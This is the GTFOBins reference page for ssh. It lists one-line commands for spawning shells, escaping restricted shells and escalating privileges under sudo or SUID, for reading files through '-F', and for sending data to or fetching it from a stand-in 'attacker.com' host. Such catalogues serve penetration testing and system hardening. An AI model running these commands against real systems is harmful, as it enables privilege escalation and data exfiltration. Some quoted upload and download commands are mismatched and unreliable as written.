ssh | GTFOBins

.. / ssh

Sponsor Fork Star

Shell

This executable can spawn an interactive system shell.

Comment

Reconnecting may help bypassing restricted shells.

Unprivileged

This function can be performed by any unprivileged user.

ssh localhost /bin/sh

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

ssh localhost /bin/sh

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

ssh localhost /bin/sh

Unprivileged

This function can be performed by any unprivileged user.

ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x

Comment

Spawn the shell on the client, but still requires a successful remote connection.

Unprivileged

This function can be performed by any unprivileged user.

ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost

File read

This executable can read data from local files.

Comment

The read file content is corrupted by error prints.

Unprivileged

This function can be performed by any unprivileged user.

ssh -F /path/to/input-file x

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

ssh -F /path/to/input-file x

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

ssh -F /path/to/input-file x

Upload

This executable can upload local data.

Unprivileged

This function can be performed by any unprivileged user.

echo DATA | ssh user@attacker.com 'cat >/path/to/output-file"

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

echo DATA | ssh user@attacker.com 'cat >/path/to/output-file"

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

echo DATA | ssh user@attacker.com 'cat >/path/to/output-file"

Receiver

An SSH server can be used on the attacker box to receive the data.

Download

This executable can download remote data.

Unprivileged

This function can be performed by any unprivileged user.

ssh user@attacker.com 'cat /path/to/input-file"

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

ssh user@attacker.com 'cat /path/to/input-file"

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

ssh user@attacker.com 'cat /path/to/input-file"

Sender

An SSH server can be used on the attacker box to send the data.